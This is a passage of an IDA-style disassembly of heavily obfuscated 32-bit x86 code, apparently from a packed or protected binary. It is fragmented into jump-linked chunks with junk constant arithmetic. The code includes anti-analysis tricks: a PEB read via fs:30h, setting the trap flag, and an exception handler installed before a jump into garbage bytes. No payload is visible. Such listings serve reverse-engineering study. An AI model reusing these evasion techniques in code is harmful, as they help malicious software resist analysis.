; FUNCTION CHUNK AT 00424E99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004262F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D10 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428707 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429A15 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042D5E1 SIZE 0000000E BYTES
lea eax, [ebp-2C8h]
push eax
push 4C91A0h
push 59DBEBD2h
pop eax
add eax, 1A34FE6Dh
add eax, ebp
jmp loc_424503
sub_427ED1 endp
; =============== S U B R O U T I N E =======================================
sub_427EF0 proc near ; CODE XREF: sub_42A642-48C5�p
mov [esp+0], eax
retn
sub_427EF0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C68
loc_427EF4: ; CODE XREF: sub_429C68+4AB4�j
jmp loc_42E463
; END OF FUNCTION CHUNK FOR sub_429C68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_427EF9: ; CODE XREF: sub_425BF8+7037�j
jmp loc_429F11
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A70
loc_427EFE: ; CODE XREF: sub_424A70+5F20�j
jmp nullsub_180
; END OF FUNCTION CHUNK FOR sub_424A70
; =============== S U B R O U T I N E =======================================
sub_427F03 proc near ; CODE XREF: sub_42D888-9719�p
; FUNCTION CHUNK AT 00424832 SIZE 00000005 BYTES
call sub_4255E9
loc_427F08: ; CODE XREF: sub_42A241-7072�j
xchg edx, [esp+0]
jmp loc_424832
sub_427F03 endp
; ---------------------------------------------------------------------------
loc_427F10: ; CODE XREF: _0182ofla:004230ED�j
; _0182ofla:0042DE05�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_427F14: ; CODE XREF: sub_426319+14�j
jmp loc_4280CA
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_427F19: ; CODE XREF: sub_42E218-9468�j
jmp loc_42A897
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429071
loc_427F1E: ; CODE XREF: sub_429071+B�j
push eax
push 1D402E9Dh
mov eax, offset loc_4232FC
xchg eax, [esp+8+var_8]
retn
; END OF FUNCTION CHUNK FOR sub_429071
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423704
loc_427F2D: ; CODE XREF: sub_423704+D�j
jmp loc_42EDAF
; END OF FUNCTION CHUNK FOR sub_423704
; =============== S U B R O U T I N E =======================================
sub_427F32 proc near ; CODE XREF: sub_425C9C+10�j
; FUNCTION CHUNK AT 00428383 SIZE 0000000B BYTES
push ebx
pushf
push 744CD3B3h
pop ebx
and ebx, 1301BE3Ch
sub ebx, 0F288394Ch
add ebx, 0E287A71Ch
jmp loc_428383
sub_427F32 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_427F51: ; CODE XREF: sub_426020+6EE3�j
shr eax, 2
and ecx, edx
sbb edi, 6A8F33F1h
jmp loc_42AEFC
; END OF FUNCTION CHUNK FOR sub_426020
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor ebx, esi
jmp sub_4281B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_427F69: ; CODE XREF: sub_42380D:loc_42D204�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
jmp loc_4291B5
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428599
loc_427F8E: ; CODE XREF: sub_428599+A�j
push offset sub_424157
jmp nullsub_215
; END OF FUNCTION CHUNK FOR sub_428599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_427F98: ; CODE XREF: sub_424E6E-1552�j
and eax, ebp
loc_427F9A: ; CODE XREF: sub_424E6E:loc_427B13�j
call sub_427797
loc_427F9F: ; CODE XREF: sub_427E90:loc_42A1A6�j
add eax, 4CAA89FCh
xchg eax, [esp-4+arg_0]
jmp sub_4295D6
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
byte_427FAD db 67h, 0CCh, 0E9h ; CODE XREF: sub_42839E+C�j
dd 0FFFFD685h
; ---------------------------------------------------------------------------
loc_427FB4: ; DATA XREF: sub_42C906-4A8F�o
jmp loc_424F1A
; ---------------------------------------------------------------------------
jmp loc_42B855
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_427FBE: ; CODE XREF: sub_427445:loc_42B470�j
call nullsub_1
mov eax, large fs:30h
add eax, 0BE6620Fh
call sub_429DCF
loc_427FD5: ; CODE XREF: sub_42DD86-49CE�j
jmp loc_426B1E
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9A5
loc_427FDA: ; CODE XREF: sub_42E9A5-72AD�j
jnz loc_423F5D
push eax
mov ebx, [edi]
loc_427FE3: ; CODE XREF: sub_42E9A5:loc_42EB41�j
rol ebx, 0Ch
add ebx, 5E42EED8h
jmp loc_427198
; END OF FUNCTION CHUNK FOR sub_42E9A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_427FF2: ; DATA XREF: sub_426CF9+9�o
rol edx, 5
add edx, esp
push offset loc_4233CF
jmp loc_42D209
; ---------------------------------------------------------------------------
push offset sub_427AB9
jmp locret_42B2A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42800B: ; CODE XREF: sub_423A2A+3705�j
call sub_42C2CC
test al, al
jz loc_42CB26
jmp loc_42B495
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DDA6
loc_42801D: ; CODE XREF: sub_42DDA6:loc_426126�j
mov dword ptr [edx], 1000h
jmp loc_42A23C
; END OF FUNCTION CHUNK FOR sub_42DDA6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E282
loc_428028: ; CODE XREF: sub_42E282�j
push 7180082Dh
pop eax
add eax, 8EC2C9C7h
push ecx
pushf
push 3AC8F41Dh
pop ecx
jmp loc_427786
; END OF FUNCTION CHUNK FOR sub_42E282
; =============== S U B R O U T I N E =======================================
sub_428041 proc near ; CODE XREF: sub_4267F8-3171�p
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 004231B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423CB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424013 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424CBD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425953 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00425B96 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00425E48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429049 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00429D40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AB1E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B063 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D119 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DC71 SIZE 0000001F BYTES
mov [esp+0], ebx
jns loc_424CBD
add edx, eax
push ebx
pushf
push 990B334Eh
pop ebx
jmp loc_425B96
sub_428041 endp
; ---------------------------------------------------------------------------
loc_428059: ; CODE XREF: _0182ofla:loc_428CDB�j
jl loc_428322
; =============== S U B R O U T I N E =======================================
sub_42805F proc near ; CODE XREF: sub_42C33B+1�p
mov [esp+0], edi
pop edi
pop ebx
retn
sub_42805F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C58A
loc_428065: ; CODE XREF: sub_42C58A+E�j
jmp loc_424F1A
; END OF FUNCTION CHUNK FOR sub_42C58A
; ---------------------------------------------------------------------------
loc_42806A: ; CODE XREF: _0182ofla:00424523�j
jmp loc_42B3D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42806F: ; CODE XREF: sub_423A2A+10E1�j
; sub_423A2A+3574�j
mov eax, ds:dword_427A24
jmp loc_42CCBD
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_428079: ; CODE XREF: sub_42A420:loc_427781�j
mov ds:dword_42E8C0, eax
retn
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276E3
loc_428080: ; CODE XREF: sub_4276E3-2E7D�j
jmp sub_423FCD
; END OF FUNCTION CHUNK FOR sub_4276E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_428085: ; CODE XREF: sub_42A420:loc_424202�j
rol eax, 5
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42808A: ; CODE XREF: sub_428729+DB8�j
mov eax, [ebp-8]
push offset loc_42EB2E
jmp nullsub_120
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_428097: ; CODE XREF: sub_4291BA:loc_42CF82�j
xchg eax, [esp+0]
or eax, 100h
xchg eax, [esp+0]
popf
nop
jmp loc_424D97
; END OF FUNCTION CHUNK FOR sub_4291BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428245
loc_4280AA: ; CODE XREF: sub_428245+1B�j
add eax, 206AA45Ah
push eax
call sub_426E6A
; END OF FUNCTION CHUNK FOR sub_428245
; =============== S U B R O U T I N E =======================================
sub_4280B6 proc near ; CODE XREF: sub_425629+B�p
; _0182ofla:004274AB�j
xchg eax, [esp+0]
pop eax
lea eax, loc_42707C
push offset loc_427072
jmp nullsub_39
sub_4280B6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_4280CA: ; CODE XREF: sub_426319:loc_427F14�j
or ebx, ecx
and eax, 6816E9B3h
xor eax, ebx
add edx, eax
xor eax, 0D4FBA740h
jmp loc_4265BB
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_4280E1: ; CODE XREF: sub_42E218:loc_42A897�j
; sub_42E218-19CB�j
push ecx
push 894875C1h
pop ecx
xor ecx, 0C5145604h
and ecx, 0E37399DEh
add ecx, 0BFF2E607h
jmp loc_4242E2
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
pop eax
add eax, 3B7EB973h
shl eax, cl
mov edx, [ebp-14h]
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42810B: ; CODE XREF: sub_42798F:loc_426CD2�j
jmp loc_42591C
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_428110 proc near ; CODE XREF: _0182ofla:004230D4�j
; sub_42CE01+9�p
; FUNCTION CHUNK AT 00425903 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C7C5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042DCAC SIZE 00000010 BYTES
mov [esp+0], edx
pop edx
or eax, eax
jnz loc_42729C
jmp loc_425903
sub_428110 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428121: ; CODE XREF: _0182ofla:0042B1B5�j
add edx, 0DB190781h
mov edx, [edx]
xchg edx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42812D: ; CODE XREF: sub_42660C+516C�j
jmp sub_4271D2
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
loc_428132: ; CODE XREF: _0182ofla:0042DF12�j
jz loc_42D884
jmp loc_42CA8D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9A5
loc_42813D: ; CODE XREF: sub_42E9A5:loc_427198�j
xchg ebx, [esp+4+var_4]
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_42E9A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_428145: ; CODE XREF: sub_42537E+4F30�j
add esi, 0FB2B4EA9h
loc_42814B: ; CODE XREF: sub_42537E:loc_42740F�j
mov eax, [ebp-4]
mov eax, [eax]
jmp loc_429517
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428155: ; CODE XREF: sub_42798F:loc_42CAF0�j
cmp byte ptr [ebp-5], 0
jnz loc_429D23
jmp loc_4298F2
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
xchg ecx, ebp
not ebp
jmp sub_42EDCF
; =============== S U B R O U T I N E =======================================
sub_42816D proc near ; CODE XREF: sub_42B669+11D3�p
mov [esp+0], eax
retn
sub_42816D endp
; ---------------------------------------------------------------------------
loc_428171: ; CODE XREF: _0182ofla:00429D7E�j
jmp loc_42D25E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428176 proc near ; CODE XREF: sub_42894D+4�p
; sub_42326C+8492�p
; FUNCTION CHUNK AT 004262DD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042855D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428E28 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042ADAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B63B SIZE 00000005 BYTES
push ebp
loc_428177: ; CODE XREF: sub_425B6E:loc_424847�j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42855D
sub_428176 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428183: ; CODE XREF: sub_42798F-BB9�j
sbb ebp, 75A21C2Bh
jmp loc_428A81
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
mov [esi], edx
and ecx, ebp
jmp sub_426CF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C5EF
loc_428197: ; CODE XREF: sub_42C5EF:loc_42777C�j
mov ebp, esp
push 0D0865FCBh
push offset loc_42E33C
jmp nullsub_103
; END OF FUNCTION CHUNK FOR sub_42C5EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_4281A8: ; CODE XREF: sub_423AF2+11�j
xor ebx, 704742DEh
test ebx, 4
jmp loc_42B791
; END OF FUNCTION CHUNK FOR sub_423AF2
; =============== S U B R O U T I N E =======================================
sub_4281B9 proc near ; CODE XREF: sub_428A39:loc_423896�p
; _0182ofla:00427F64�j
; FUNCTION CHUNK AT 0042B88C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C11E SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
pushf
push 642A7F2Eh
jmp loc_42C11E
sub_4281B9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_4281C8: ; CODE XREF: sub_428D63+45C0�j
sub eax, 0BE119FC3h
test eax, 2000h
jmp loc_42862F
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
call sub_429B69
test al, al
jz loc_42E938
jmp loc_42828F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_4281EB: ; CODE XREF: sub_429E52-4516�j
mov esi, 0B6659E2Ah
jbe loc_4254D6
push eax
jmp loc_42481C
; ---------------------------------------------------------------------------
loc_4281FC: ; CODE XREF: sub_429E52:loc_425520�j
cmp dword ptr [ebp-4], 5
jmp loc_42AB13
; END OF FUNCTION CHUNK FOR sub_429E52
; =============== S U B R O U T I N E =======================================
sub_428205 proc near ; CODE XREF: _0182ofla:0042822A�j
; sub_42EAB7-2363�p
; FUNCTION CHUNK AT 00425AC8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042D632 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
or eax, edx
jmp loc_42D632
sub_428205 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42821C: ; CODE XREF: _0182ofla:004253EF�j
jnz loc_423E5E
jmp loc_42AA8B
; ---------------------------------------------------------------------------
shr esi, 5
jmp sub_428205
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1DA
loc_42822F: ; CODE XREF: sub_42E1DA:loc_429BE2�j
xor ecx, 54A8B37Ah
cmp eax, ecx
pop ecx
mov edx, 9C62C5C0h
add edx, ecx
pop eax
jmp loc_42B2F5
; END OF FUNCTION CHUNK FOR sub_42E1DA
; =============== S U B R O U T I N E =======================================
sub_428245 proc near ; CODE XREF: _0182ofla:004292D0�j
; sub_424184+A259�p
; FUNCTION CHUNK AT 004280AA SIZE 0000000C BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-0Ch], eax
push 4BD7C857h
pop eax
xor eax, 30640CF4h
add eax, 63E19693h
add eax, ebp
jmp loc_4280AA
sub_428245 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428265 proc near ; DATA XREF: sub_428A39+629E�o
; FUNCTION CHUNK AT 0042323A SIZE 00000005 BYTES
test eax, eax
jz loc_429D23
mov eax, [ebp-0Ch]
neg eax
sbb eax, eax
neg eax
jmp loc_42323A
sub_428265 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A5F
loc_42827B: ; CODE XREF: sub_428A5F+D�j
; sub_42CB00+16�j
rol eax, 0Fh
push eax
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_428A5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_428285: ; CODE XREF: sub_425DA5:loc_42397A�j
; _0182ofla:004277BF�j
call sub_423FCD
jmp loc_425852
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
loc_42828F: ; CODE XREF: _0182ofla:004281E6�j
jnz loc_42E535
jmp loc_426945
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42829A: ; CODE XREF: sub_4282B8:loc_42C78F�j
pop edx
mov eax, [eax]
push edi
push 0E4549DA0h
pop edi
rol edi, 12h
sub edi, 0A5407973h
jmp loc_42C4D8
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
loc_4282B2: ; CODE XREF: _0182ofla:004244BD�j
jle loc_4271B7
; =============== S U B R O U T I N E =======================================
sub_4282B8 proc near ; CODE XREF: sub_426E96+B�p
; FUNCTION CHUNK AT 00423131 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424AA0 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00425081 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004254AB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426488 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426A53 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0042829A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00428F4F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00429926 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A120 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A1C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C13A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C3F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C4D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C78F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CB99 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D18C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042D7C5 SIZE 00000014 BYTES
mov [esp+0], ebx
pop ebx
push edx
jmp loc_4254AB
sub_4282B8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_4282C2: ; CODE XREF: sub_4289E4:loc_428394�j
mov [ebp-8], eax
loc_4282C5: ; CODE XREF: sub_42C2F0:loc_4297E8�j
jo loc_42C309
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jmp loc_42A877
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_4282D6: ; CODE XREF: sub_42E689:loc_427572�j
add ecx, 18h
mov al, [ecx]
add ecx, 9Ch
add [ecx], al
add ecx, 4
mov dword ptr [ecx], offset loc_427618
xor eax, eax
pop ecx
jmp loc_425784
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
sbb esi, 6442743Ch
xor edx, ecx
jmp sub_429BEC
; ---------------------------------------------------------------------------
cmp eax, edx
jmp loc_427627
; ---------------------------------------------------------------------------
loc_42830E: ; CODE XREF: _0182ofla:00424B41�j
mov [ebp-4], eax
mov eax, [ebp-4]
xchg ebx, [esp]
mov ecx, ebx
pop ebx
jmp loc_4239E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AB1
loc_42831F: ; CODE XREF: sub_423F65+9�j
; sub_429AB1:loc_42674E�j
ror eax, 12h
loc_428322: ; CODE XREF: _0182ofla:loc_428059�j
mov ds:dword_42E8C4, eax
retn
; END OF FUNCTION CHUNK FOR sub_429AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_428329: ; CODE XREF: sub_42E689-5063�j
jmp loc_4256F7
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42832E: ; CODE XREF: sub_42448C+1B37�j
; sub_426BDA+381F�j
rol eax, 12h
jmp loc_423E64
; END OF FUNCTION CHUNK FOR sub_42448C
; =============== S U B R O U T I N E =======================================
sub_428336 proc near ; DATA XREF: sub_42D056+DDA�o
; FUNCTION CHUNK AT 0042488D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B4A5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042CCF9 SIZE 0000000B BYTES
mov ds:dword_42578C, eax
jmp loc_42B4A5
sub_428336 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_428340: ; CODE XREF: sub_42D056+4�j
push edx
push 0AE4DC4AFh
pop edx
add edx, 51F49E09h
xchg edx, [esp+0]
jmp sub_423FCD
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_428355: ; CODE XREF: sub_42D833+1501�j
mov ebp, 0D777B4Eh
jmp loc_42B1BA
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B70
loc_42835F: ; CODE XREF: sub_424B70:loc_4236C5�j
or dword ptr [eax-8], 8
loc_428363: ; CODE XREF: sub_424B70+8�j
; sub_42798F:loc_427A8A�j ...
push offset loc_4243A1
jmp nullsub_40
; END OF FUNCTION CHUNK FOR sub_424B70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_42836D: ; CODE XREF: sub_42A642:loc_4242D8�j
mov ebp, ebx
pop ebx
mov eax, ds:dword_42B8E0
or eax, eax
jnz loc_425D7A
jmp loc_428668
; END OF FUNCTION CHUNK FOR sub_42A642
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F32
loc_428383: ; CODE XREF: sub_427F32+1A�j
popf
call sub_42DA65
jmp loc_427A01
; END OF FUNCTION CHUNK FOR sub_427F32
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42838F: ; CODE XREF: sub_4253F4+5EF5�j
jmp loc_425C09
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_428394: ; CODE XREF: sub_4289E4:loc_4290CF�j
jmp loc_4282C2
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BDA
loc_428399: ; CODE XREF: sub_426BDA+11�j
jmp loc_42A3F1
; END OF FUNCTION CHUNK FOR sub_426BDA
; =============== S U B R O U T I N E =======================================
sub_42839E proc near ; CODE XREF: sub_423BD5+8�p
push dword ptr fs:0
mov fs:0, esp
jmp near ptr byte_427FAD
sub_42839E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_4283AF: ; CODE XREF: sub_428D63+18DA�j
jz loc_425F5B
jmp loc_427568
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_4283BA: ; CODE XREF: _0182ofla:004258AC�j
cdq
; =============== S U B R O U T I N E =======================================
sub_4283BB proc near ; CODE XREF: _0182ofla:loc_4236D0�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042434E SIZE 0000000A BYTES
xchg ebx, [esp-4+arg_0]
pop ebx
ror edx, 11h
mov ebx, eax
pop eax
pop edx
pop ecx
jmp loc_42434E
sub_4283BB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4283CC: ; CODE XREF: _0182ofla:0042D64B�j
jmp sub_429038
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_4283D2: ; CODE XREF: sub_428F0F+C�j
jmp loc_42ACC4
; END OF FUNCTION CHUNK FOR sub_428F0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_4283D7: ; CODE XREF: sub_42B15E-7D9C�j
; sub_423A2A+1�j ...
jb loc_423045
call sub_423FCD
test al, al
jz loc_424C90
jmp loc_42626F
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_4283EF proc near ; DATA XREF: _0182ofla:loc_42E2A9�o
; FUNCTION CHUNK AT 0042357E SIZE 00000005 BYTES
pop large dword ptr fs:0
add esp, 4
loc_4283F9: ; CODE XREF: _0182ofla:0042E7B9�j
push offset sub_42E9FF
jmp loc_42357E
sub_4283EF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_428403: ; CODE XREF: sub_423A2A:loc_42E2E9�j
pop ebp
jl loc_424F2A
jl loc_4235A6
xor edx, 0C573DE12h
mov esi, [ecx]
jmp loc_424C84
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42841D: ; CODE XREF: sub_428D63:loc_42DE10�j
jnz loc_429EC1
loc_428423: ; CODE XREF: sub_42EDCF+1D�j
jmp loc_42DD5C
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_428428: ; CODE XREF: sub_42D056-20BE�j
jmp loc_42CBF6
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
cmp edi, ebp
jmp loc_423753
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDEB
loc_428434: ; CODE XREF: sub_42CDEB+11�j
xor ecx, 6A60C8DDh
add ecx, ebp
add ecx, 5716C0Eh
call sub_424E36
; END OF FUNCTION CHUNK FOR sub_42CDEB
; =============== S U B R O U T I N E =======================================
sub_428447 proc near ; CODE XREF: _0182ofla:00426184�p
; _0182ofla:0042D996�j
arg_0 = dword ptr 4
mov [esp+0], ebx
pop ebx
mov esp, ebp
mov ebp, offset sub_42D897
xchg ebp, [esp-4+arg_0]
retn
sub_428447 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_428456: ; CODE XREF: sub_423AF2:loc_429831�j
sbb ebx, edi
; END OF FUNCTION CHUNK FOR sub_423AF2
; START OF FUNCTION CHUNK FOR sub_42DB2E
loc_428458: ; CODE XREF: sub_42DB2E+10�j
or eax, 66041A0Eh
xor eax, 0AEB4653Ch
add eax, ebp
add eax, 3F6FE056h
mov eax, [eax]
jmp loc_42981C
; END OF FUNCTION CHUNK FOR sub_42DB2E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_428473: ; CODE XREF: sub_42B1F9+9�j
test al, al
jz loc_425440
jmp loc_42E0C5
; END OF FUNCTION CHUNK FOR sub_42B1F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
